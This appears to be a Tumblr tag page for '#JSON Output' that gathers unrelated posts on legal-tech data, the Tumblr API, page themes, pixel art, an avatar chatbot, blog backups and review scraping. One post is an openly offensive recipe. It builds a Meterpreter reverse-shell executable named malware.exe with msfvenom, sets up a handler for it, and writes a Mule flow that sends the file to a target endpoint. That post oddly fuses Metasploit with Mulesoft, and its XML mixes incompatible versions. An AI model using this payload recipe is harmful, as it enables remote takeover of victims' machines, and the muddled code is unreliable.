#JSON Output

Explore tagged Tumblr posts

Text

The Quiet Power of JSON: Structuring Legal Intelligence at Scale

By Paul A. Jones, Jr. · July 2025

Most people think of JSON as a simple utility: a way to pass data between frontend and backend, or to store structured values in a flexible way. But in building data infrastructure for a complex, rules-driven domain, I’ve come to view JSON as something far more powerful: a foundational medium for scalable intelligence. It’s the gateway to organizing knowledge,…

#asp-net#Audit Logs#Audit Trail#c#Case Intake#Case Timeline#Compliance#data modeling#Deadline Calculator#Discovery Rule#Entity Framework#JSON Output#Legal Deadlines#LegalTech#Limitation Periods#MS Test#Notes Repository#Premium Features#Repository Pattern#Search Notes#SQL Server#Statute of Limitations#stored-procedures#Tolling#Unit Testing

0 notes

Note

Will archives be ever turned into a json ? when you place /archives at the end of a tumblr blog url the archives are visible. will you allow for something like /archives/json ?

Answer: Hello there, @richardmurrayhumblr!

Good news! While we won’t be adding a new endpoint like /archives/JSON, you can already fetch posts as JSON data from our v2 API. You will need to register for an API key first.

Blogs also have a “V1” API, that outputs JSON like this: https://cyle.tumblr.com/api/read/json.
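For anyone reading that V1 output from a script rather than a browser, here is a minimal Python sketch. It assumes the response body is the JSON object wrapped in a JavaScript assignment (something like `var tumblr_api_read = {...};`), which is how the endpoint appears to respond. The sample body and its fields are made up for illustration; check a real response before relying on any field name.

```python
import json


def parse_v1_response(body: str) -> dict:
    """Strip the assumed JavaScript wrapper and parse the JSON object inside."""
    start = body.index("{")   # first brace of the JSON object
    end = body.rindex("}")    # last brace of the JSON object
    return json.loads(body[start:end + 1])


# Hypothetical, shortened response body for illustration only.
sample = (
    'var tumblr_api_read = {"posts-total": 2, '
    '"posts": [{"id": "1", "tags": ["json"]}, {"id": "2"}]};\n'
)

data = parse_v1_response(sample)
post_ids = [post["id"] for post in data["posts"]]
print(post_ids)
```
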

Thank you for your question, and we hope this helps!

Oh, and one last thing. This came to mind as we worked on your question, and now you all need to live with it. Sorry!

The famous Greek tale of … JSON and the Archive-nots.

121 notes


Text

[BETA] PAGE THEME : SOMA

⚠️ EXPERIMENTAL ⚠️ JANKY AS HELL! Simple character page theme using Tumblr posts as content based on a tag. Full instructions on GitHub and under the read more.

↳ [GITHUB] [PREVIEW]

Features:

Unlimited characters

Filter navigation

Using Tumblr posts to fill the page via post2page.

Uses:

Tumblr v1 API

Handlebars.js

Isotope.js

@magnusthemes combofilters

Edit and customise to your liking. Don’t repost/redistribute and/or claim it as your own. Do not use as a base code. Leave the credit, thank you.

As always, explanations under the read more. If you are having issues, take a look at this theme's FAQ, or my general FAQ. Please note that this is an experiment for lazy people. Not finding anything? Send me a message. Please report any bugs to me.

HOW TO USE

This page theme pulls information from your Tumblr tagged posts and fills out the character card with it. This relies on specific post formatting.

Here's everything you need to get started:

Tumblr's v1 API JSON output to a whole blog or specific tag on the blog (e.g. https://soma-preview.tumblr.com/api/read/json?&tagged=soma page cards)

Some Tumblr posts

Get Tumblr's v1 API JSON output

Replace [BLOGNAME] with your blog name. And [YOUR TAGS] with your tag. If your tag has spaces, add the spaces. Place one of the following scripts before closing </head> tag.

For a whole blog:

<script src="https://[BLOGNAME].tumblr.com/api/read/json"></script>

For specific tagged posts on the blog:

<script src="https://[BLOGNAME].tumblr.com/api/read/json?&tagged=[YOUR TAGS]"></script>
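If you want to check the URL outside of a theme (for example from a script), a small Python helper can build it. This is only a sketch: `v1_json_url` is a hypothetical helper name, and it percent-encodes spaces in the tag, which a browser would normally do for you when the URL sits in a script tag.

```python
from typing import Optional
from urllib.parse import quote


def v1_json_url(blog_name: str, tag: Optional[str] = None) -> str:
    """Build the v1 JSON URL for a whole blog, or for one tag on that blog."""
    base = f"https://{blog_name}.tumblr.com/api/read/json"
    if tag is None:
        return base
    # Spaces in the tag become %20 so the URL is valid outside a browser.
    return f"{base}?tagged={quote(tag)}"


print(v1_json_url("soma-preview"))
print(v1_json_url("soma-preview", "soma page cards"))
```
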

Post Formatting

This only works with posts made with the new editor. This will not work with legacy posts!

For this page to work, it's necessary to follow a specific post formatting. Right now, the script supports the following:

Image: The first image in a post. {{this.img}}

Blockquote ("Subtitle"): The first blockquote block in a post. {{this.subtitle}}

Table: Using the chat block, you can add as many details as you want. In your template, these details use their "key" (the text before the colon) with any spaces removed {{this.[WHATEVERYOUENTERED]}}. The text after the colon must be italics.

Paragraph: The paragraph immediately after the chat block (MAKE THIS THE FIRST?) {{this.description}}

Link: The first link in a post. {{this.link}}

Tags: Any tags added to the post. {{this.tags}}
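To make the chat block rule concrete, here is a rough Python sketch of how "key: value" lines could turn into template fields with the spaces removed from the key. This is not the actual post2page code, just an illustration of the naming rule; `parse_chat_block` and the sample lines are made up.

```python
def parse_chat_block(lines):
    """Turn 'Key Name: value' lines into a dict keyed by 'KeyName'."""
    details = {}
    for line in lines:
        key, sep, value = line.partition(":")
        if not sep:
            continue  # not a 'key: value' line, so skip it
        details[key.replace(" ", "")] = value.strip()
    return details


# Made-up chat block lines for illustration.
card = parse_chat_block(["Full Name: Soma Example", "Age: 27", "no colon here"])
print(card)
```

With this input, the detail entered as "Full Name" would be reachable in a template as {{this.FullName}}.
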

Example Tumblr post: https://soma-preview.tumblr.com/post/724075330107785216/love-is-careless-love-is-blind-title

If you want to build your own card template, please read the full READ MORE on GitHub.

117 notes


Text



made a little house of leaves text replacement script for Firefox with the FoxReplace extension ! instructions under the cut

basically replaces house with

<span style ="color:#6570ae">house</span>

and minotaur with

<span style ="color:red"><s>minotaur</s></span>

firefox installation method:

get the FoxReplace extension: https://addons.mozilla.org/en-US/firefox/addon/foxreplace/

Script: save the following as a .json file, and import it into FoxReplace:

{
  "version": "2.6",
  "groups": [
    {
      "name": "House of leaves",
      "urls": [],
      "substitutions": [
        { "input": "house", "inputType": "text", "outputType": "text", "output": "<span style =\"color:#6570ae\">house</span>", "caseSensitive": true },
        { "input": "minotaur", "inputType": "text", "outputType": "text", "output": "<span style =\"color:red\"><s>minotaur</s></span>", "caseSensitive": true },
        { "input": "House", "inputType": "text", "outputType": "text", "output": "<span style =\"color:#6570ae\">House</span>", "caseSensitive": true },
        { "input": "Minotaur", "inputType": "text", "outputType": "text", "output": "<span style =\"color:red\"><s>Minotaur</s></span>", "caseSensitive": true }
      ],
      "html": "output",
      "enabled": true,
      "mode": "auto&manual"
    }
  ]
}
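If more words get added later, writing each lowercase and capitalized entry by hand gets tedious. Here is a small Python sketch that generates the same kind of file. The field names are copied from the config above, not from any FoxReplace documentation, so treat the structure as an assumption; `build_config` and `substitution` are made-up helper names.

```python
import json


def substitution(word, html):
    """One case-sensitive text substitution, mirroring the fields used above."""
    return {
        "input": word,
        "inputType": "text",
        "outputType": "text",
        "output": html,
        "caseSensitive": True,
    }


def build_config(styles):
    """Create entries for each word in lowercase and capitalized form."""
    subs = []
    for word, template in styles.items():
        for variant in (word, word.capitalize()):
            subs.append(substitution(variant, template.format(word=variant)))
    group = {
        "name": "House of leaves",
        "urls": [],
        "substitutions": subs,
        "html": "output",
        "enabled": True,
        "mode": "auto&manual",
    }
    return {"version": "2.6", "groups": [group]}


styles = {
    "house": '<span style ="color:#6570ae">{word}</span>',
    "minotaur": '<span style ="color:red"><s>{word}</s></span>',
}
config = build_config(styles)
config_text = json.dumps(config, indent=2)  # save this text as a .json file
print(config_text)
```
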

notes:

I haven't finished House of Leaves yet so it currently only substitutes house and Minotaur.

Recommended to turn on Automatic substitution On page load

Not recommended to Apply automatic substitutions every few seconds, it moves your cursor in an opened text editor. sadly cant see the house in blue while im typing this post

-> edit: it only affects the tumblr post editor??

Not recommended to change the HTML to input&output (currently output only) because it would fuck up URLs and tags

4 notes


Note

hi ! I have to learn pixel art for a game development class im taking.... do you have any tips to perhaps get started? (i have aseprite alr :3) thank u!!!!!!!!

Hi! I'm not the best person to ask this (my only projects for game dev were unfinished projects very early on), but I'll try to help

There's 3 important things that I'd say you should know about pixel art for game development specifically: Tiles/Tilesets, Character Animation, and Consistent Sizing

Let's go for one by one



Tiles/Tilesets

While you can make completely hand-drawn scenes for games, it's certainly way harder to do, as it requires a lot more time to achieve, and with things like deadlines on the way, you'll probably have to crunch yourself to achieve it on time, which I wouldn't recommend, especially if you're just starting out

This is where the Tiles/Tilesets come in handy. To put it simply, a Tile is a pattern that can either repeat horizontally/vertically/in all sides, or also a pattern that doesn't exactly repeat in any direction, but can be used to give a smoother end to something, like a corner. There's way more uses for Tiles, but these two are the most common types you'll see

A tileset is a collection of tiles, commonly with the tiles being together with those they work well with

Below is an example of a (messy) tileset along with how the tiles work together!

Basically these two allow you to make scenes more quickly and easily, which is a lifesaver most of the time

Below is the most common type of tileset (for platformers and side-view games)!

There's a variant of this which adds slopes and smoother corners on the insides, but this is still a good starting point

Basically these tiles allow you to cover most sizes regarding ground/wall tiles, which work well in things like gameboy games for example

As for Aseprite, in the latest update they added tileset layers, which makes it way easier to reorganize tiles, along with the existing Tiled mode, which duplicates your current canvas along all axes (or a specific one, depending on which one you pick) to see how the tile connects with its surroundings

You can enable Tiled mode by going into View > Tiled Mode and picking the best option that suits your tile. As for the tileset layers, there's this video that goes far more into detail on how it works:

youtube

Character Animation

I want you to look at this set of animations

How many frames do you think were used for each one?

The answer is 4 or less!

The idle animation has 3 frames, the walking/running animation has 4, and the sliding animation has 2! (which technically is the exact same image, but slightly moved left and right between each frame)

If you're starting out with pixel art, I'd really recommend to minimize the amount of frames you use in total, as it'll make it way easier to work with if you don't know much about pixel art/animation, plus you can still manage to add tons of personality into each frame

In Aseprite, you can add tags (by clicking the frame number and "Add Tag"), which helps to separate specific animations. Also, depending on your game engine/tool, it'll pick animations either by a sprite-sheet or by separate png files. I'll cover spritesheets here as that's the most common method

In Aseprite, if you go to File > Export, you can choose to export a Spritesheet, which is essentially a set of frames connected into a single image, which can then be imported into a game engine/tool and be tweaked there

There's 4 buttons in the Export Spritesheet prompt, "Layout", "Sprite", "Borders" and "Output"

In "Layout" you can select how the frames should be arranged, along with setting constraints on them

In "Sprite", you can select the source of these frames, along with specifying if you want to export a specific layer/tag or all of them

in "Borders" you can specify if you want to add padding or remove space from your exported file

and in "Output" you can enable the option to export the spritesheet (in "Output file") along with a JSON data file if you want

Tweak these options depending on how your game engine/tool handles spritesheets, and you should be good to go!
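If your engine/tool doesn't read the JSON data file by itself, here's a rough Python sketch of pulling the frame rectangles and tags out of it. The layout used here ("frames" with a "frame" rectangle each, plus "meta" > "frameTags" with "from"/"to" indices) is what I'd expect from an Aseprite export, but treat it as an assumption and compare it with your own file. The sample data is made up.

```python
import json


def load_frames(sheet_json):
    """Return (rects, tags): frame rectangles, and rectangles grouped per tag."""
    data = json.loads(sheet_json)
    frames = data["frames"]
    if isinstance(frames, dict):
        # "Hash" style export: frames keyed by filename, kept in file order.
        frames = list(frames.values())
    rects = [
        (f["frame"]["x"], f["frame"]["y"], f["frame"]["w"], f["frame"]["h"])
        for f in frames
    ]
    tags = {}
    for tag in data.get("meta", {}).get("frameTags", []):
        # "from" and "to" are inclusive frame indices.
        tags[tag["name"]] = rects[tag["from"]:tag["to"] + 1]
    return rects, tags


# Made-up export with three 16x16 frames in one row.
SHEET = """{
  "frames": [
    {"filename": "hero 0.png", "frame": {"x": 0, "y": 0, "w": 16, "h": 16}, "duration": 100},
    {"filename": "hero 1.png", "frame": {"x": 16, "y": 0, "w": 16, "h": 16}, "duration": 100},
    {"filename": "hero 2.png", "frame": {"x": 32, "y": 0, "w": 16, "h": 16}, "duration": 100}
  ],
  "meta": {
    "frameTags": [
      {"name": "idle", "from": 0, "to": 1, "direction": "forward"},
      {"name": "slide", "from": 2, "to": 2, "direction": "forward"}
    ]
  }
}"""

rects, tags = load_frames(SHEET)
print(tags["idle"])
```
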

Consistent Sizing

if you do art with backgrounds already, this shouldn't be hard to do, but it's still important!

This one should be straightforward; Keep the sizes of the characters and scenarios around the same size! Unless you're making something like Grounded, a character will look out of place with a normal house 20 times its size

Work between the sizes of the tiles and characters to make consistent sizes all around

You can break this rule somewhat if it helps portray your idea better, like here:

but don't go too over the top with it!

I hope this helped a bit ^^

(sorry for the delay with this btw)

18 notes


Text

I love you lexical analysis. I love you unstructured text processing. I love you natural language parsing. I love you data transformation. I love you unattended feature extraction. I love you named entity recognition. I love you optical character recognition. I love you text to json pipeline. I hate you, hand correction of malformed output.

2 notes


Text

Open Platform For Enterprise AI Avatar Chatbot Creation

How may an AI avatar chatbot be created using the Open Platform For Enterprise AI framework?

I. Flow Diagram

The graph displays the application’s overall flow. The Open Platform For Enterprise AI GenAIExamples repository’s “Avatar Chatbot” serves as the code sample. The “AvatarChatbot” megaservice, the application’s central component, is highlighted in the flowchart diagram. Four distinct microservices (Automatic Speech Recognition (ASR), Large Language Model (LLM), Text-to-Speech (TTS), and Animation) are coordinated by the megaservice and linked into a Directed Acyclic Graph (DAG).

Every microservice manages a specific avatar chatbot function. For instance:

Software for voice recognition that translates spoken words into text is called Automatic Speech Recognition (ASR).

By comprehending the user’s query, the Large Language Model (LLM) analyzes the transcribed text from ASR and produces the relevant text response.

The text response produced by the LLM is converted into audible speech by a text-to-speech (TTS) service.

The animation service makes sure that the lip movements of the avatar figure correspond with the synchronized speech by combining the audio response from TTS with the user-defined AI avatar picture or video. A video of the avatar conversing with the user is then produced.

An audio question and a visual input of an image or video are among the user inputs. A face-animated avatar video is the result. By hearing the audible response and observing the chatbot’s natural speech, users will be able to receive input from the avatar chatbot that is nearly real-time.

Create the “Animation” microservice in the GenAIComps repository

We would need to register a new microservice, such as “Animation,” under comps/animation in order to add it:

Register the microservice

@register_microservice(
    name="opea_service@animation",
    service_type=ServiceType.ANIMATION,
    endpoint="/v1/animation",
    host="0.0.0.0",
    port=9066,
    input_datatype=Base64ByteStrDoc,
    output_datatype=VideoPath,
)
@register_statistics(names=["opea_service@animation"])

Following the registration procedure, we specify the callback function that will be used when this microservice is run. The “animate” function, which accepts a “Base64ByteStrDoc” object as input audio and creates a “VideoPath” object with the path to the generated avatar video, will be used in the “Animation” case. It sends an API request to the “wav2lip” FastAPI’s endpoint from “animation.py” and retrieves the response in JSON format.

Remember to import it in comps/__init__.py and add the “Base64ByteStrDoc” and “VideoPath” classes in comps/cores/proto/docarray.py!

This link contains the code for the “wav2lip” server API. Incoming audio Base64Str and user-specified avatar picture or video are processed by the post function of this FastAPI, which then outputs an animated video and returns its path.

The functional block for the microservice is created with the aid of the aforementioned procedures. We must create a Dockerfile for the “wav2lip” server API and another for “Animation” to enable the user to launch the “Animation” microservice and build the required dependencies. For instance, the Dockerfile.intel_hpu begins with the PyTorch* installer Docker image for Intel Gaudi and concludes with the execution of a bash script called “entrypoint.”

Create the “AvatarChatbot” Megaservice in GenAIExamples

The megaservice class AvatarChatbotService will be defined initially in the Python file “AvatarChatbot/docker/avatarchatbot.py.” Add “asr,” “llm,” “tts,” and “animation” microservices as nodes in a Directed Acyclic Graph (DAG) using the megaservice orchestrator’s “add” function in the “add_remote_service” function. Then, use the flow_to function to join the edges.
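The idea of adding microservices as nodes and joining them with edges can be sketched in plain Python. The class below is a hypothetical stand-in, not the actual megaservice orchestrator: it only borrows the “add” and “flow_to” names from the description above, and the four lambda functions are placeholder stubs rather than real ASR, LLM, TTS, or animation services.

```python
from collections import defaultdict, deque


class MiniOrchestrator:
    """Hypothetical stand-in for a megaservice orchestrator (illustration only)."""

    def __init__(self):
        self.services = {}              # node name -> callable
        self.edges = defaultdict(list)  # node name -> downstream node names

    def add(self, name, func):
        self.services[name] = func
        return self

    def flow_to(self, src, dst):
        self.edges[src].append(dst)

    def run(self, initial_input):
        """Run nodes in topological order, passing each output downstream."""
        indegree = {name: 0 for name in self.services}
        for targets in self.edges.values():
            for target in targets:
                indegree[target] += 1
        ready = deque(name for name, degree in indegree.items() if degree == 0)
        inputs = {name: initial_input for name in ready}
        result = None
        while ready:
            node = ready.popleft()
            result = self.services[node](inputs[node])
            for target in self.edges[node]:
                inputs[target] = result
                indegree[target] -= 1
                if indegree[target] == 0:
                    ready.append(target)
        return result  # output of the last node that ran


orchestrator = MiniOrchestrator()
orchestrator.add("asr", lambda audio: f"text({audio})")
orchestrator.add("llm", lambda text: f"reply({text})")
orchestrator.add("tts", lambda reply: f"speech({reply})")
orchestrator.add("animation", lambda speech: f"video({speech})")
orchestrator.flow_to("asr", "llm")
orchestrator.flow_to("llm", "tts")
orchestrator.flow_to("tts", "animation")

video = orchestrator.run("audio.wav")
print(video)
```
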

Specify megaservice’s gateway

An interface through which users can access the Megaservice is called a gateway. The Python file GenAIComps/comps/cores/mega/gateway.py contains the definition of the AvatarChatbotGateway class. The host, port, endpoint, input and output datatypes, and megaservice orchestrator are all contained in the AvatarChatbotGateway. Additionally, it provides a handle_request function that schedules the initial input, together with parameters, to be sent to the first microservice and gathers the response from the last microservice.

In order for users to quickly build the AvatarChatbot backend Docker image and launch the “AvatarChatbot” examples, we must lastly create a Dockerfile. Scripts to install required GenAI dependencies and components are included in the Dockerfile.

II. Face Animation Models and Lip Synchronization

GFPGAN + Wav2Lip

A state-of-the-art lip-synchronization method that uses deep learning to precisely match audio and video is Wav2Lip. Included in Wav2Lip are:

A pretrained expert lip-sync discriminator that can accurately detect sync in real videos

A modified LipGAN model to produce a frame-by-frame talking face video

An expert lip-sync discriminator is trained using the LRS2 dataset as part of the pretraining phase. To determine the likelihood that the input video-audio pair is in sync, the lip-sync expert is pre-trained.

A LipGAN-like architecture is employed during Wav2Lip training. The generator includes a face decoder, a visual encoder, and a speech encoder. All three are made up of stacks of convolutional layers. The discriminator is also built from convolutional blocks. The modified LipGAN is trained similarly to previous GANs: the discriminator is trained to discriminate between frames produced by the generator and the ground-truth frames, and the generator is trained to minimize the adversarial loss based on the discriminator’s score. In total, a weighted sum of the following loss components is minimized in order to train the generator:

An L1 reconstruction loss between the ground-truth and generated frames

A synchronization loss between the input audio and the output video frames, scored by the lip-sync expert

Depending on the discriminator score, an adversarial loss between the generated and ground-truth frames
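Written out, the weighted sum of the three components listed above takes roughly the following form. The symbols and weights are assumed notation for illustration, not values taken from this article: the lambdas are the weighting coefficients, the hatted y is a generated frame, y is the matching ground-truth frame, and N is the number of frames.

```latex
L_{\text{total}}
  = \lambda_{\text{rec}}\, L_{\text{rec}}
  + \lambda_{\text{sync}}\, L_{\text{sync}}
  + \lambda_{\text{adv}}\, L_{\text{adv}},
\qquad
L_{\text{rec}} = \frac{1}{N} \sum_{i=1}^{N} \lVert \hat{y}_i - y_i \rVert_1
```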

At inference time, we provide the audio speech from the previous TTS block and the video frames with the avatar figure to the Wav2Lip model. The trained Wav2Lip model then produces a lip-synced video in which the avatar speaks the speech.

The Wav2Lip-generated video is lip-synchronized, although the resolution around the mouth region is reduced. To enhance the face quality in the produced video frames, we can optionally add a GFPGAN model after Wav2Lip. The GFPGAN model uses face restoration to predict a high-quality image from an input facial image that has unknown degradation. A pretrained face GAN (like StyleGAN2) is used as a prior in this U-Net degradation removal module. Because the GFPGAN model is pretrained to recover high-quality facial information in its output frames, the result is a more vibrant and lifelike avatar representation.

SadTalker

SadTalker is another cutting-edge model option for facial animation in addition to Wav2Lip. SadTalker, a stylized audio-driven talking-head video creation tool, produces the 3D motion coefficients (head pose and expression) of a 3D Morphable Model (3DMM) from audio. These coefficients are mapped to 3D key points, which a 3D-aware face renderer then uses to animate the input image. A lifelike talking head video is the result.

Intel made it possible to use the Wav2Lip model on Intel Gaudi AI accelerators and the SadTalker and Wav2Lip models on Intel Xeon Scalable processors.

Read more on Govindhtech.com

#AIavatar#OPE#Chatbot#microservice#LLM#GenAI#API#News#Technews#Technology#TechnologyNews#Technologytrends#govindhtech

3 notes


Text

when doing pixel graphics, especially low res pixel graphics, it's not necessarily all that simple and straightforward or even particularly desirable to use the kind of vector fonts typically in use by modern graphical OSes, so instead I'm manually assembling a few bitmap fonts for the purpose.

Current plan is to then write a fairly simple python script to read the resulting .png file(s) along with any necessary metadata via json or something and encode it in a basic binary format - thinking of going with two bits per pixel at the moment, using one for transparency and the other for colour so I can have characters with built in shadow or the like if I want.
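A rough sketch of what that two-bits-per-pixel packing could look like in Python. The bit layout (transparency bit high, colour bit low, four pixels per byte, leftmost pixel in the highest bits) is just one assumption picked for illustration, not a settled format.

```python
def pack_2bpp(pixels):
    """Pack (opaque, colour) bit pairs into bytes, four pixels per byte."""
    out = bytearray()
    for i in range(0, len(pixels), 4):
        byte = 0
        for slot, (opaque, colour) in enumerate(pixels[i:i + 4]):
            value = (opaque << 1) | colour   # 2-bit value for this pixel
            byte |= value << (6 - 2 * slot)  # leftmost pixel in the top bits
        out.append(byte)
    return bytes(out)


def unpack_2bpp(data, count):
    """Inverse of pack_2bpp for the first `count` pixels."""
    pixels = []
    for index in range(count):
        byte = data[index // 4]
        value = (byte >> (6 - 2 * (index % 4))) & 0b11
        pixels.append((value >> 1, value & 1))
    return pixels


# Five pixels: transparent, opaque colour 1, opaque colour 0 (e.g. shadow), ...
row = [(0, 0), (1, 1), (1, 0), (0, 0), (1, 1)]
packed = pack_2bpp(row)
print(packed.hex())
```

A partially filled last byte is padded with zero bits, so the pixel count (or glyph width and height) has to live in the metadata.
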

Anyway being able to write debug info directly to the graphical window rather than having to use the slower console output would be helpful when writing more advanced blitting and rasterization functions so maybe I can finally make some progress on the actual graphical parts of this thing.

6 notes


Text

Creating a webmention inbox

Next script on the chopping block is going to be a webmention endpoint. Think of it as an inbox where you collect comments, reblogs, likes, etcetera. I found a script that handles most of it already, under creative commons. So, all I will need to add is something to parse the contents of it.

-=Some design points=-

Needs to block collection from urls in a banlist/blacklist

Needs to collect commenter info from h-cards - if no card is found, just use website link.

Limit filesize of the comment. And truncate too long strings of comments

Adds a timestamp if no publish date is found

output formatted data, including the target page, into a JSON for easy retrieval by javascript

If no file exists, then create empty JSON file.

Write an associated javascript to display the likes, comments, and reblogs on the webpage.

Update existing comments if the SOURCE already exists in the json file.

Javascript

Will retrieve any comments where the target matches the page URL

Will insert comments in the "comments" class

Reblogs/mentions inserted without content into "reblog" class

Insert likes counter into a "likes" class

Sorted by date/timestamp
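To pin down the design points before writing the real thing, here is a rough Python sketch of the storage logic only (no HTTP endpoint, no h-card parsing). The field names ("source", "target", "content", "published"), the length limit, and the banlist entry are all placeholders I made up for the sketch.

```python
import time
from urllib.parse import urlparse

MAX_COMMENT_CHARS = 500      # assumed limit for truncating long comments
BANLIST = {"spam.example"}   # hypothetical banned host


def upsert_mention(store, mention, now=None):
    """Add a mention to the list, or replace the one with the same source."""
    host = urlparse(mention["source"]).hostname or ""
    if host in BANLIST:
        return False  # blocked source, nothing is stored
    entry = dict(mention)
    entry["content"] = entry.get("content", "")[:MAX_COMMENT_CHARS]
    # Add a timestamp only when no publish date was found.
    entry.setdefault("published", now if now is not None else time.time())
    # Drop any older entry from the same source, then store the new one.
    store[:] = [m for m in store if m["source"] != entry["source"]]
    store.append(entry)
    return True


def mentions_for(store, target):
    """All mentions of one page, oldest first."""
    matches = [m for m in store if m["target"] == target]
    return sorted(matches, key=lambda m: m["published"])
```

The store is a plain list so it can be written out with json.dump and read back by the page's JavaScript; an empty list doubles as the "empty JSON file" case.
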

*Keep in mind, I do work a full time job, so I am just doing this in my free time. *

2 notes


Text

Metasploit: Setting a Custom Payload Mulesoft

To transform and set a custom payload in Metasploit and Mulesoft, you need to follow specific steps tailored to each platform. Here are the detailed steps for each:

Metasploit: Setting a Custom Payload

Open Metasploit Framework:

msfconsole

Select an Exploit:

use exploit/multi/handler

Configure the Payload:

set payload <payload_name>

Replace <payload_name> with the desired payload, for example: set payload windows/meterpreter/reverse_tcp

Set the Payload Options:

set LHOST <attacker_IP>

set LPORT <attacker_port>

Replace <attacker_IP> with your attacker's IP address and <attacker_port> with the port you want to use.

Generate the Payload:

msfvenom -p <payload_name> LHOST=<attacker_IP> LPORT=<attacker_port> -f <format> -o <output_file>

Example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /tmp/malware.exe

Execute the Handler:

exploit

Mulesoft: Transforming and Setting Payload

Open Anypoint Studio: Open your Mulesoft Anypoint Studio to design and configure your Mule application.

Create a New Mule Project:

Go to File -> New -> Mule Project.

Enter the project name and finish the setup.

Configure the Mule Flow:

Drag and drop a HTTP Listener component to the canvas.

Configure the HTTP Listener by setting the host and port.

Add a Transform Message Component:

Drag and drop a Transform Message component after the HTTP Listener.

Configure the Transform Message component to define the input and output payload.

Set the Payload:

In the Transform Message component, set the payload using DataWeave expressions. Example:

%dw 2.0
output application/json
---
{
  message: "Custom Payload",
  timestamp: now()
}

Add Logger (Optional):

Drag and drop a Logger component to log the transformed payload for debugging purposes.

Deploy and Test:

Deploy the Mule application.

Use tools like Postman or cURL to send a request to your Mule application and verify the custom payload transformation.

Example: Integrating Metasploit with Mulesoft

If you want to simulate a scenario where Mulesoft processes payloads for Metasploit, follow these steps:

Generate Payload with Metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /tmp/malware.exe

Create a Mule Flow to Handle the Payload:

Use the File connector to read the generated payload file (malware.exe).

Transform the file content if necessary using a Transform Message component.

Send the payload to a specified endpoint or store it as required. Example Mule flow:

<file:read doc:name="Read Payload" path="/tmp/malware.exe"/>
<dw:transform-message doc:name="Transform Payload">
  <dw:set-payload><![CDATA[%dw 2.0
output application/octet-stream
---
payload]]></dw:set-payload>
</dw:transform-message>
<http:request method="POST" url="http://target-endpoint" doc:name="Send Payload">
  <http:request-builder>
    <http:header headerName="Content-Type" value="application/octet-stream"/>
  </http:request-builder>
</http:request>

Following these steps, you can generate and handle custom payloads using Metasploit and Mulesoft. This process demonstrates how to effectively create, transform, and manage payloads across both platforms.

3 notes


Text

tumblr-backup and datasette

I've been using tumblr_backup, a script that replicates the old Tumblr backup format, for a while. I use it both to back up my main blog and the likes I've accumulated; they outnumber posts over two to one, it turns out.

Sadly, there isn't an 'archive' view of likes, so I have no idea what's there from way back in 2010, when I first really heavily used Tumblr. Heck, even getting back to 2021 is hard. Pulling that data to manipulate it locally seems wise.

I was never quite sure it'd backed up all of my likes, and it turns out that a change to the API was in fact limiting it to the most recent 1,000 entries. Luckily, someone else noticed this well before I did, and a new version, tumblr-backup, not only exists, but is a Python package, which made it easy to install and run. (You do need an API key.)

I ran it using this invocation, which saved the JSON source (-j), saved likes (-l), didn't download images (-k), skipped the first 1,000 entries (-s 1000), and output to the directory 'likes/full' (-O):

tumblr-backup -j -k -l -s 1000 blech -O likes/full

This gave me over 12,000 files in likes/full/json, one per like. This is great, but a database is nice for querying. Luckily, jq exists:

jq -s 'map(.)' likes/full/json/*.json > likes/full/likes.json

This slurps (-s) in every JSON file, iterates over them to make a list, and then saves it in a new JSON file, likes.json. There was a follow-up I did to get it into the right format for sqlite3:

jq -c '.[]' likes/full/likes.json > likes/full/likes-nl.json

A smart reader can probably combine those into a single operator.
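For what it's worth, I believe `jq -c '.' likes/full/json/*.json` would produce the newline-delimited file in one step, though I haven't rerun it that way. If you'd rather skip jq entirely, a minimal Python sketch of the same two steps looks like this (`combine_to_ndjson` is just a name I picked):

```python
import json
from pathlib import Path


def combine_to_ndjson(json_dir, out_path):
    """Write every *.json file in json_dir as one compact line of out_path."""
    count = 0
    with open(out_path, "w", encoding="utf-8") as out:
        for path in sorted(Path(json_dir).glob("*.json")):
            with open(path, encoding="utf-8") as handle:
                record = json.load(handle)
            out.write(json.dumps(record) + "\n")
            count += 1
    return count


if __name__ == "__main__":
    total = combine_to_ndjson("likes/full/json", "likes/full/likes-nl.json")
    print(f"wrote {total} records")
```
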

Using Simon Willison's sqlite-utils package, I could then load all of them into a database (with --alter because the keys of each JSON file vary, so the initial column setup is incomplete):

sqlite-utils insert likes/full/likes.db lines likes/full/likes-nl.json --nl --alter

This can then be fed into Willison's Datasette for a nice web UI to query it:

datasette serve --port 8002 likes/full/likes.db

There are a lot of columns there that clutter up the view: I'd suggest this is a good subset (it also shows the post with most notes (likes, reblogs, and comments combined) at the top):

select rowid, id, short_url, slug, blog_name, date, timestamp, liked_timestamp, caption, format, note_count, state, summary, tags, type from lines order by note_count desc limit 101
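The same kind of query also works without the web UI, using Python's built-in sqlite3 module. This sketch runs against a tiny in-memory table with made-up rows so it is self-contained; point `sqlite3.connect` at likes/full/likes.db to use the real data. The table name `lines` matches the one given to sqlite-utils above.

```python
import sqlite3


def top_posts(conn, limit=5):
    """Return (id, blog_name, note_count) rows, most notes first."""
    query = (
        "select id, blog_name, note_count from lines "
        "order by note_count desc limit ?"
    )
    return conn.execute(query, (limit,)).fetchall()


# In-memory stand-in for likes.db, with made-up rows.
conn = sqlite3.connect(":memory:")
conn.execute("create table lines (id integer, blog_name text, note_count integer)")
conn.executemany(
    "insert into lines values (?, ?, ?)",
    [(1, "a", 10), (2, "b", 300), (3, "c", 42)],
)
rows = top_posts(conn, limit=2)
print(rows)
```
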

Happy excavating!

2 notes


Text

How Web Scraping TripAdvisor Reviews Data Boosts Your Business Growth

Are you one of the 94% of buyers who rely on online reviews to make the final decision? This means that most people today explore reviews before taking action, whether booking hotels, visiting a place, buying a book, or something else.

We understand the stress of booking the right place, especially when visiting somewhere new. Finding the balance between a perfect spot, services, and budget is challenging. Many of you consider TripAdvisor reviews a go-to solution for closely getting to know the place.

Here comes the accurate game-changing method—scrape TripAdvisor reviews data. But wait, is it legal and ethical? Yes, as long as you respect the website's terms of service, don't overload its servers, and use the data for personal or non-commercial purposes. What? How? Why?

Do not stress. We will help you understand why many hotel, restaurant, and attraction place owners invest in web scraping TripAdvisor reviews or other platform information. This powerful tool empowers you to understand your performance and competitors' strategies, enabling you to make informed business changes. What next?

Let's dive in and give you a complete tour of the process of web scraping TripAdvisor review data!

What Is Scraping TripAdvisor Reviews Data?

